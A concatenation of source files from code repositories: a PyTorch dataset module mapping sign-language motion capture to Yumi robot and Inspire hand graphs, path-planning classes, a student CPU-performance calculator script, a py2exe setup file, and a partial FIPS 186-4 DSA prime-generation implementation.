[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]])
# position
pos = torch.from_numpy(glove_pos).float()
# edge attributes
edge_attr = []
for edge in edge_index.permute(1, 0):
parent = edge[0]
child = edge[1]
edge_attr.append(pos[child] - pos[parent])
edge_attr = torch.stack(edge_attr, dim=0)
# skeleton type & topology type
skeleton_type = 0
topology_type = 0
# end effector mask
ee_mask = torch.zeros(num_nodes, 1).bool()
ee_mask[3] = ee_mask[6] = ee_mask[9] = ee_mask[12] = ee_mask[16] = True
# elbow mask
el_mask = torch.zeros(num_nodes, 1).bool()
el_mask[1] = el_mask[4] = el_mask[7] = el_mask[10] = el_mask[13] = True
# parent
parent = torch.LongTensor([-1, 0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15])
# offset
offset = torch.zeros(num_nodes, 3)
for node_idx in range(num_nodes):
if parent[node_idx] != -1:
offset[node_idx] = pos[node_idx] - pos[parent[node_idx]]
# distance to root
root_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while parent[current_idx] != -1:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
root_dist[node_idx] = dist
# distance to elbow
elbow_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and not el_mask[current_idx]:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
elbow_dist[node_idx] = dist
data = Data(x=x,
edge_index=edge_index,
edge_attr=edge_attr,
pos=pos,
skeleton_type=skeleton_type,
topology_type=topology_type,
ee_mask=ee_mask,
el_mask=el_mask,
root_dist=root_dist,
elbow_dist=elbow_dist,
num_nodes=num_nodes,
parent=parent,
offset=offset)
# print(data)
return data
"""
Source Dataset for Sign Language with Hand
"""
class SignWithHand(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignWithHand, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = parse_h5_hand(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Target Dataset for Inspire Hand
"""
class InspireHand(InMemoryDataset):
hand_cfg = {
'joints_name': [
'yumi_link_7_r_joint',
'Link1',
'Link11',
'Link1111',
'Link2',
'Link22',
'Link2222',
'Link3',
'Link33',
'Link3333',
'Link4',
'Link44',
'Link4444',
'Link5',
'Link51',
'Link52',
'Link53',
'Link5555',
],
'edges': [
['yumi_link_7_r_joint', 'Link1'],
['Link1', 'Link11'],
['Link11', 'Link1111'],
['yumi_link_7_r_joint', 'Link2'],
['Link2', 'Link22'],
['Link22', 'Link2222'],
['yumi_link_7_r_joint', 'Link3'],
['Link3', 'Link33'],
['Link33', 'Link3333'],
['yumi_link_7_r_joint', 'Link4'],
['Link4', 'Link44'],
['Link44', 'Link4444'],
['yumi_link_7_r_joint', 'Link5'],
['Link5', 'Link51'],
['Link51', 'Link52'],
['Link52', 'Link53'],
['Link53', 'Link5555'],
],
'root_name': 'yumi_link_7_r_joint',
'end_effectors': [
'Link1111',
'Link2222',
'Link3333',
'Link4444',
'Link5555',
],
'elbows': [
'Link1',
'Link2',
'Link3',
'Link4',
'Link5',
],
}
def __init__(self, root, transform=None, pre_transform=None):
super(InspireHand, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data_list.append(hand2graph(file, self.hand_cfg))
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
parse h5 with all data
"""
def parse_all(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
print('Skipping'+key)
continue
# position data
l_shoulder_pos = h5_file[key + '/l_up_pos'][:]
r_shoulder_pos = h5_file[key + '/r_up_pos'][:]
l_elbow_pos = h5_file[key + '/l_fr_pos'][:]
r_elbow_pos = h5_file[key + '/r_fr_pos'][:]
l_wrist_pos = h5_file[key + '/l_hd_pos'][:]
r_wrist_pos = h5_file[key + '/r_hd_pos'][:]
# quaternion data
l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:])
r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:])
l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:])
r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:])
l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:])
r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:])
# rotation matrix data
l_shoulder_matrix = l_shoulder_quat.as_matrix()
r_shoulder_matrix = r_shoulder_quat.as_matrix()
l_elbow_matrix = l_elbow_quat.as_matrix()
r_elbow_matrix = r_elbow_quat.as_matrix()
l_wrist_matrix = l_wrist_quat.as_matrix()
r_wrist_matrix = r_wrist_quat.as_matrix()
# transform to local coordinates
# l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix)
# r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix)
# l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix)
# r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix)
# l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix)
# r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix)
# euler data
l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True)
r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True)
l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True)
r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True)
l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True)
r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True)
# glove data
l_glove_pos = h5_file[key + '/l_glove_pos'][:]
r_glove_pos = h5_file[key + '/r_glove_pos'][:]
# insert zero for root
total_frames = l_glove_pos.shape[0]
l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1)
r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1)
# print(l_glove_pos.shape, r_glove_pos.shape)
# switch dimensions
l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1)
r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1)
for t in range(total_frames):
data = Data()
l_hand_data = parse_glove_pos(l_glove_pos[t])
data.l_hand_x = l_hand_data.x
data.l_hand_edge_index = l_hand_data.edge_index
data.l_hand_edge_attr = l_hand_data.edge_attr
data.l_hand_pos = l_hand_data.pos
data.l_hand_ee_mask = l_hand_data.ee_mask
data.l_hand_el_mask = l_hand_data.el_mask
data.l_hand_root_dist = l_hand_data.root_dist
data.l_hand_elbow_dist = l_hand_data.elbow_dist
data.l_hand_num_nodes = l_hand_data.num_nodes
data.l_hand_parent = l_hand_data.parent
data.l_hand_offset = l_hand_data.offset
r_hand_data = parse_glove_pos(r_glove_pos[t])
data.r_hand_x = r_hand_data.x
data.r_hand_edge_index = r_hand_data.edge_index
data.r_hand_edge_attr = r_hand_data.edge_attr
data.r_hand_pos = r_hand_data.pos
data.r_hand_ee_mask = r_hand_data.ee_mask
data.r_hand_el_mask = r_hand_data.el_mask
data.r_hand_root_dist = r_hand_data.root_dist
data.r_hand_elbow_dist = r_hand_data.elbow_dist
data.r_hand_num_nodes = r_hand_data.num_nodes
data.r_hand_parent = r_hand_data.parent
data.r_hand_offset = r_hand_data.offset
arm_data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t],
l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t],
l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t])
data.x = arm_data.x
data.edge_index = arm_data.edge_index
data.edge_attr = arm_data.edge_attr
data.pos = arm_data.pos
data.q = arm_data.q
data.skeleton_type = arm_data.skeleton_type
data.topology_type = arm_data.topology_type
data.ee_mask = arm_data.ee_mask
data.sh_mask = arm_data.sh_mask
data.el_mask = arm_data.el_mask
data.root_dist = arm_data.root_dist
data.shoulder_dist = arm_data.shoulder_dist
data.elbow_dist = arm_data.elbow_dist
data.num_nodes = arm_data.num_nodes
data.parent = arm_data.parent
data.offset = arm_data.offset
data_list.append(data)
return data_list
"""
Source Dataset for Sign Language with Hand
"""
class SignAll(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignAll, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = parse_all(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Target Dataset for Yumi
"""
class YumiAll(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(YumiAll, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = yumi2graph(file, YumiDataset.yumi_cfg)
hand_data = hand2graph(file, InspireHand.hand_cfg)
data.hand_x = hand_data.x
data.hand_edge_index = hand_data.edge_index
data.hand_edge_attr = hand_data.edge_attr
data.hand_ee_mask = hand_data.ee_mask
data.hand_el_mask = hand_data.el_mask
data.hand_root_dist = hand_data.root_dist
data.hand_elbow_dist = hand_data.elbow_dist
data.hand_num_nodes = hand_data.num_nodes
data.hand_parent = hand_data.parent
data.hand_offset = hand_data.offset
data.hand_axis = hand_data.axis
data.hand_lower = hand_data.lower
data.hand_upper = hand_data.upper
data_list.append(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
if __name__ == '__main__':
yumi_dataset = YumiDataset(root='./data/target/yumi')
sign_dataset = SignDataset(root='./data/source/sign/train', pre_transform=transforms.Compose([Normalize()]))
inspire_hand = InspireHand(root='./data/target/yumi-with-hands')
sign_with_hand = SignWithHand(root='./data/source/sign-hand/train', pre_transform=transforms.Compose([Normalize()]))
sign_all = SignAll(root='./data/source/sign-all/train', pre_transform=transforms.Compose([Normalize()]))
yumi_all = YumiAll(root='./data/target/yumi-all')
``` |
{
"source": "0aqz0/Robotics-Notebook",
"score": 2
} |
#### File: PathPlanning/DynamicWindowApproach/DynamicWindowApproach.py
```python
from PathPlanning.utils import *
class DWAPlanner(PathPlanner):
def __init__(self):
PathPlanner.__init__(self)
def plan(self, start, target):
pass
```
#### File: Robotics-Notebook/PathPlanning/geometry.py
```python
import math
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def dist(self, other):
return math.sqrt(pow(self.x - other.x, 2) + pow(self.y - other.y, 2))
def dir(self, other):
return math.atan2(other.y - self.y, other.x - self.x)
def tuple(self):
return self.x, self.y
class Vector(object):
def __init__(self, x, y):
self.x = x
self.y = y
def dir(self):
return math.atan2(self.y, self.x)
def mod(self):
return math.sqrt(pow(self.x, 2) + pow(self.y, 2))
def __mul__(self, other):
return Vector(other*self.x, other*self.y)
def __add__(self, other):
return Vector(self.x+other.x, self.y+other.y)
def Polar2Vector(dist, theta):
return Vector(dist*math.cos(theta), dist*math.sin(theta))
```
#### File: PathPlanning/PotentialField/PotentialField.py
```python
from PathPlanning.utils import *
class PotentialFieldPlanner(PathPlanner):
def __init__(self, map, iterations=1e4, step_size=2, ka=1, kr=1e4, da=10, dr=100):
PathPlanner.__init__(self)
self.map = map
self.iterations = iterations
self.step_size = step_size
self.motions = [
Vector(1, 0), # right
Vector(0, 1), # up
Vector(-1, 0), # left
Vector(0, -1), # down
Vector(-1, -1), # left and down
Vector(-1, 1), # left and up
Vector(1, -1), # right and down
Vector(1, 1), # right and up
]
self.ka = ka
self.kr = kr
self.da = da
self.dr = dr
def plan(self, start, target):
self.finalPath = []
self.finalPath.append(start)
for iteration in range(int(self.iterations)):
currentPos = self.finalPath[-1]
if currentPos.dist(target) < self.step_size:
print('final')
break
lowestPotential = float('inf')
nextPos = currentPos
for motion in self.motions:
newPos = currentPos + motion * self.step_size
newPotential = self.calculate_attractive_potential(newPos, target) + self.calculate_repulsive_potential(newPos)
if newPotential < lowestPotential:
lowestPotential = newPotential
nextPos = newPos
self.finalPath.append(nextPos)
def calculate_attractive_potential(self, pos, target):
if pos.dist(target) <= self.da:
return self.ka * pos.dist(target) ** 2
else:
return self.ka * (2 * self.da * pos.dist(target) - self.da ** 2)
def calculate_repulsive_potential(self, pos):
pr = 0
for obs in self.map.obstacles:
if obs.dist(pos) == 0:
return float('inf')
if obs.dist(pos) <= self.dr:
pr = pr + 0.5 * self.kr * (1/obs.dist(pos) - 1/self.dr) ** 2
return pr
def calculate_potential_force(self, pos, target):
# attractive force(simple version)
attractive_force = Vector(pos.x - target.x, pos.y - target.y) * (-self.ka)
# repulsive force
repulsive_force = Vector(0, 0)
for obs in self.map.obstacles:
if obs.dist(pos) == 0:
repulsive_force += Vector(float('inf'), float('inf'))
elif obs.dist(pos) <= self.dr:
repulsive_force += Vector(pos.x - obs.pos.x, pos.y - obs.pos.y) * self.kr * (1/obs.dist(pos) - 1/self.dr) * ((1/obs.dist(pos))**2) * (1/obs.dist(pos))
# sum up
potential_force = attractive_force + repulsive_force
return potential_force
```
#### File: PathPlanning/RRT/run.py
```python
from PathPlanning.RRT import RRTPlanner
from PathPlanning.utils import *
def main():
map = Map(top=480, down=0, left=0, right=640)
map.add_obstacle(CircleObstacle(pos=Point(300, 300), radius=50))
map.add_obstacle(RectangleObstacle(top=300, down=100, left=500, right=550))
start = Point(0, 0)
end = Point(640, 480)
rrtPlanner = RRTPlanner(map, epsilon=0.05, stepSize=10)
while map.is_open:
rrtPlanner.plan(start=start, target=end)
map.add_geometry(type='point', pos=start.tuple(), size=30, color=(100, 0, 0))
map.add_geometry(type='point', pos=end.tuple(), size=30, color=(0, 100, 0))
for node in rrtPlanner.nodeList:
map.add_geometry(type='point', pos=node.pos.tuple())
if node.parent is not None:
map.add_geometry(type='line', start=node.parent.pos.tuple(), end=node.pos.tuple())
for i in range(len(rrtPlanner.finalPath)-1):
map.add_geometry(type='line', start=rrtPlanner.finalPath[i].tuple(), end=rrtPlanner.finalPath[i+1].tuple(), color=(0, 100, 0))
map.render()
if __name__ == '__main__':
main()
```
#### File: PathPlanning/RRTStarSmart/run.py
```python
from PathPlanning.RRTStarSmart import RRTStarSmartPlanner
from PathPlanning.utils import *
def main():
map = Map(left=0, right=640, top=480, down=0)
map.add_obstacle(RectangleObstacle(left=450, right=550, top=220, down=200))
map.add_obstacle(RectangleObstacle(left=100, right=400, top=300, down=250))
map.add_obstacle(RectangleObstacle(left=400, right=450, top=400, down=50))
rrtStarSmartPlanner = RRTStarSmartPlanner(map=map, iterations=1e3, epsilon=0.3, step_size=10)
start = Point(550, 350)
end = Point(200, 150)
while map.is_open:
rrtStarSmartPlanner.plan(start=start, target=end)
map.add_geometry(type='point', pos=start.tuple(), size=20, color=(100, 0, 0))
map.add_geometry(type='point', pos=end.tuple(), size=20, color=(0, 100, 0))
for i in range(len(rrtStarSmartPlanner.finalPath)-1):
map.add_geometry(type='line', start=rrtStarSmartPlanner.finalPath[i].tuple(), end=rrtStarSmartPlanner.finalPath[i+1].tuple(), color=(0, 100, 0))
map.render()
if __name__ == '__main__':
main()
``` |
{
"source": "0Augusto/ArquiteturadeComputadores2",
"score": 4
} |
#### File: ArquiteturadeComputadores2/Lista_1/ExercicioTrinta.py
```python
print("Programa em python para calcular o exercicio 30 da lista.")
print("<NAME>")
print("675263")
print("Arquitetura de Computador II")
print("Professor: <NAME>")
print()#pular uma linha
#Funcoes do programa
def menu_func():
print("""Exercicio 30
Opções:
(1) = Qual o CPI médio da máquina?
(2) = Suponha um Overclock de 12/100. Qual o speedUp sobre a máquina original?
(3) = Suponha uma alteração no Hardware e no acesso à memória. Essa alteração reduz em dois ciclos as instruções da ALU ao custo de aumentar em 1 ciclo os acessos à memória. Qual o speedup sobre a máquina original?
(4) = Considere um novo compilador que reduza em 50% as instruções da ALU. Qual o speedup sobre a máquina original?
(5) = Qual o speedup sobre a máq. original se aplicarmos todas as alterações.
(6) = Qual o tempo de execução de cada benchmark e para cada alteração acima para um código com 10000 instruções.
(0) = Encerra o programa.
""")
menu_func()
print()
escolha = input("Make a wise choice! Escolha o exercicio: ")
#Condicoes das funcoes
if escolha == "0":
print("Programa encerrado com sucesso! ")
exit()
#==========================letra a========================================
elif escolha == "1":
A = float(input("Insira a porcentagem das instrucoes da ALU: "))
B = float(input("Insira a porcentagem das instrucoes de desvio: "))
C = float(input("Insira a porcentagem das instrucoes de acesso a memoria: "))
D = float(input("Insira a porcentagem dos outros: "))
E = int(input("ALU")) #instrucoes da ALU
F = int(input("Desvio")) #instrucoes de desvio
G = int(input("Acesso memoria")) #instrucoes de acesso a memoria
H = int(input("Outras")) #outras
CPIMedio = (A * E) + (B * F) + (C * G) + (D * G)
print("O CPI medio eh: %0.4f" %CPIMedio)
#==========================letra b========================================
elif escolha == "2":
print("Inserir os número sem a notacao cientifica, dessa forma -> 1 MHZ = 1000000")
#CPUTimeOriginal = float(input("Insira o CPU original da maquina: "))
#CPUTimeMelhoria = float(input("Insira o valor melhorado do CPUTIME: "))
#speedUp = CPUTimeOriginal/CPUTtimeMelhoria
#ICoriginal = float(input("Insira a instrucao original(IC):" ))
#CPIorigina = float(input("Insira o CPI original: "))
f = float(input("Insira a frequencia original(f): "))
#ICb = float(input("Insira a instrucao de b(ICb): "))
#CPIb = float(input("Insira o CPI de b: "))
fb = float(input("Insira a frequencia de b: "))
speedUp = (f ** -1) * (1.12 * fb)
print("O valor do speedup eh: %0.4f" %speedUp)
#==========================letra c========================================
elif escolha == "3":
A = float(input("Insira a porcentagem da ULA: "))
B = float(input("Insira a porcentagem das instrucoes de desvio: "))
C = float(input("Insira a porcentagem das instrucoes de acesso: "))
D = float(input("Insira a porcentagem das outras: "))
CPIMedioc = (A * 2) + (B * 3) + (C * 6) + (D * 6)
print("O CPI medio eh: %0.4f" %CPIMedioc)
CPIOriginal = float(input("Insira o CPI original (letr a): "))
speedUpc = CPIOriginal/CPIMedioc
print("O speedup de c eh: %0.4f" %speedUpc)
#==========================letra d========================================
elif escolha == "4":
A = int(input("Insira a nova procentagem(metade) da ALU: "))
B = int(input("Insira a porcentagem (inicial) da instrucao de desvio: "))
C = int(input("Insira a porcentagem das instrucoes de acesso: "))
D = int(input("Insira a porcentagem das outras: "))
qtd = int(input("Insira a nova quantidade de instrucoes: "))
CPIMediod = ((A * 4) + (B * 3) + (C * 5) + (D * 6))/qtd
print("CPIMediod = %0.4f" %CPIMediod)
ICori = float(input("Insira a qtd de instrucoes original: "))
CPIori = float(input("Insira o CPI original: "))
ICd = float(input("Insira a qtd de instrucoes nova: "))
CPId = float(input("Insira o CPI nova: "))
speedUp = (ICori * CPIori)/(ICd * CPId)
print("O speedup eh: %0.4f" %speedUp)
#==========================letra e========================================
elif escolha == "5":
A = float(input("Insira a metade da procentagem da ALU: "))
B = float(input("Insira a % das instrucoes de desvio: "))
C = float(input("Insira a % das instrucoes de acesso: "))
D = float(input("Insira a % das outras: "))
qtd = int(input("Insiraa a nova quantidade de instrucoes total: "))
CPIe = ((A * 2) + (B * 3) + (C * 6) + (D * 6))/qtd
print("O valor do CPIe eh: %0.4f" %CPIe)
ICoriginal = 100
CPIoriginal = 4.1
qtd = int(input("Insiraa a nova quantidade de instrucoes total: "))
speedUp = ((ICoriginal/qtd) * (CPIoriginal/CPIe) * (112/100))
print("O speedUp atual eh: %0.4f" %speedUp)
#==========================letra f========================================
elif escolha == "6":
print("6 ok")
``` |
{
"source": "0avasns/CheckVocal",
"score": 2
} |
#### File: 0avasns/CheckVocal/setup.py
```python
from distutils.core import setup
import py2exe
# We need to import the glob module to search for all files.
import glob
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = "3.0.2.0"
self.company_name = "<NAME>"
self.copyright = "(c) 2020 -- June 2nd"
self.name = "CheckVocal"
CV = Target(
description = "DMDX Vocal Response & RT Check Utility",
version = "3.0.2.0",
script = "CheckVocal.pyw",
icon_resources = [(1, "cv.ico")],
dest_base = "CheckVocal")
CF = Target(
description = "Audio File RT Check Utility",
version = "3.0.2.0",
script = "CheckVocal.pyw",
icon_resources = [(1, "cf.ico")],
dest_base = "CheckFiles")
AZT = Target(
description = "DMDX output converter: .azk to .txt format",
version = "1.3.0.0",
script = "azk2txt.pyw",
icon_resources = [(1, "a2t.ico")],
dest_base = "azk2txt")
setup(
options={ "py2exe":
{"packages": ["encodings"],
"compressed": 1,
"optimize": 2}
},
windows=[CF,CF,AZT,CV], # makes no sense but whatever is first does not get an icon on the exe, so I duplicated it ...
data_files=[
(r'tcl\snacklib', glob.glob(r'C:\Program Files (x86)\Python 2.7\tcl\snacklib\*')),
("icons",["cv.ico","cf.ico","a2t.ico"]),
(".",["README-CheckVocal.txt"])
],
)
``` |
{
"source": "0awawa0/aCrypt",
"score": 3
} |
#### File: ptCrypt/Asymmetric/DSA.py
```python
from ptCrypt.Math import base, primality
import hashlib
import secrets
from ptCrypt.Util.keys import FFC_APPROVED_LENGTHS
def generateProbablePrimes(N: int, L: int, seedLength: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple:
"""Generates probable primes p and q by algorithm from
FIPS 186-4, Appendix A.1.1.2
Parameters:
N: int
Bit length of q - smaller prime
L: int
Bit length of p - bigger prime
seedLength: int
Bit length of seed, must not be less than N
hashFunction: callable
Hash function conforming to hashlib protocols. By default hashlib.sha256 is used
Hash function output length must not be less than N.
By FIPS 186-4 one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if N and L should be verified to be approved by the standard. False by default.
Returns:
result: tuple
Tuple of generated parameters:
1. status: bool
True if generation was successful and False otherwise
2. p: int
Bigger prime
3. q: int
Smaller prime
4. domainParameterSeed: int
Seed for for primes verification
5. counter: int
Counter for primes verification
"""
# Steps 1 and 2
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak:
return (False, None, None, None, None)
if seedLength < N:
(False, None, None, None, None)
# Setting count of Miller-Rabin tests to perform before single Lucas test
# according to Appendix C.3
if (N, L) == FFC_APPROVED_LENGTHS[0]:
pTests = 3
qTests = 19
elif (N, L) == FFC_APPROVED_LENGTHS[1]:
pTests = 3
qTests = 24
elif (N, L) == FFC_APPROVED_LENGTHS[2]:
pTests = 3
qTests = 27
else:
pTests = 2
qTests = 27
# Length of hash funciton output in bits
outlen = hashFunction().digest_size * 8
if outlen < N:
return (False, None, None, None, None)
# Steps 3 and 4
# n = ceil(L / outlen) - 1
if L % outlen == 0: n = L // outlen - 1
else: n = L // outlen
b = L - 1 - (n * outlen)
# Some precalculated powers of two, so we dont calculate it on each iteration
twoPowNMin1 = pow(2, N - 1) # 2^(N - 1)
twoPowSeedLength = pow(2, seedLength) # 2^seedlen
twoPowOutLength = pow(2, outlen) # 2^outlen
twoPowLMin1 = pow(2, L - 1) # 2^(L - 1)
twoPowB = pow(2, b) # 2^b
while 1:
while 1:
# Steps 5, 6, 7
domainParameterSeed = secrets.randbits(seedLength) | 2 ** (seedLength - 1)
# U = Hash(domain_parameter_seed) mod 2^(N - 1)
U = base.bytesToInt(hashFunction(base.intToBytes(domainParameterSeed)).digest()) % twoPowNMin1
# q = 2^(N - 1) + U + 1 - (U mod 2)
q = twoPowNMin1 + U + 1 - (U % 2)
# Step 8
if primality.millerRabin(q, qTests):
if primality.lucasTest(q): break
# Precalcualted value, to not calculate it in the loop
twoTimesQ = 2 * q
# Step 10
offset = 1
# Step 11
for counter in range(0, 4 * L):
# Steps 11.1 and 11.2
W = 0
for j in range(0, n):
# Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength)
v = base.bytesToInt(hashFunction(hashPayload).digest())
# W = sum(Vj * 2^(j * outlen))
W += v * pow(twoPowOutLength, j)
# Last term of W calculation
# Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength)
v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB)
# W += (Vn mod 2^b) * 2^(n * outlen)
W += v * pow(twoPowOutLength, n)
# Steps 11.3, 11.4 and 11.5
X = W + twoPowLMin1
c = X % twoTimesQ
p = X - (c - 1)
# Step 11.6
if p >= twoPowLMin1:
# Step 11.7
if primality.millerRabin(p, pTests):
if primality.lucasTest(p):
# Step 11.8
return (True, p, q, domainParameterSeed, counter)
# Step 11.9
offset = offset + n + 1
return (False, None, None, None, None)
def verifyProbablePrimesGenerationResult(p: int, q: int, domainParameterSeed: int, counter: int, hashFunction=hashlib.sha256, forceWeak: bool = False) -> bool:
"""Verifies if primes were generated by algorithm from
FIPS 186-4, Appendix A.1.1.2
Note that verification takes at least as much time as generation
Parameters:
p: int
Bigger prime
q: int
Smaller prime
seed: int
domainParameterSeed from generation function
counter: int
counter from generation function
hashFunction: callable
Hash function that conforms to hashlib protocols.
This function must be equal to the one used for primes generation
By default hashlib.sha256 is used.
By FIPS 186-4, one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if p and q should be verified to have approved lengths. False by default
Returns:
result: bool
True if verification succeeds
False if verification fails
"""
# Steps 1, 2
N = q.bit_length()
L = p.bit_length()
# Step 3
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False
# Setting count of Miller-Rabin tests to perform before single Lucas test
# according to Appendix C.3
if (N, L) == FFC_APPROVED_LENGTHS[0]:
pTests = 3
qTests = 19
elif (N, L) == FFC_APPROVED_LENGTHS[1]:
pTests = 3
qTests = 24
elif (N, L) == FFC_APPROVED_LENGTHS[2]:
pTests = 3
qTests = 27
else:
pTests = 2
qTests = 27
# Step 4
if counter > (4 * L - 1): return False
# Steps 5, 6
seedLength = domainParameterSeed.bit_length()
if seedLength < N: return False
# Precomputed value 2^(N - 1)
twoPowNMin1 = pow(2, N - 1)
# Step 7
# U = Hash(domain_parameter_seed) mod 2^(N - 1)
hashPayload = base.intToBytes(domainParameterSeed)
U = base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowNMin1
# Step 8
# computed_q = 2^(n - 1) + U + 1 - (U mod 2)
computedQ = twoPowNMin1 + U + 1 - (U % 2)
if computedQ != q: return False
# Step 9
if not primality.millerRabin(computedQ, qTests): return False
if not primality.lucasTest(computedQ): return False
outlen = hashFunction().digest_size * 8
# Step 10
# n = ceil(L / outlen) - 1
if L % outlen == 0: n = L // outlen - 1
else: n = L // outlen
# Step 11
b = L - 1 - (n * outlen)
# Some precalculated powers of two
twoPowSeedLength = pow(2, seedLength) # 2^seedlen
twoPowOutLength = pow(2, outlen) # 2^outlen
twoPowLMin1 = pow(2, L - 1) # 2^(L - 1)
twoPowB = pow(2, b) # 2^b
twoTimesQ = 2 * q # 2 * q
# Step 12
offset = 1
# Step 13
for i in range(counter + 1):
# Steps 13.1, 13.2
W = 0
for j in range(0, n):
# Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength)
v = base.bytesToInt(hashFunction(hashPayload).digest())
# W = sum(Vj * 2^(j * outlen))
W += v * pow(twoPowOutLength, j)
# Last term of W calculation
# Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength)
v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB)
# W += Vn * 2^(outlen * n)
W += v * pow(twoPowOutLength, n)
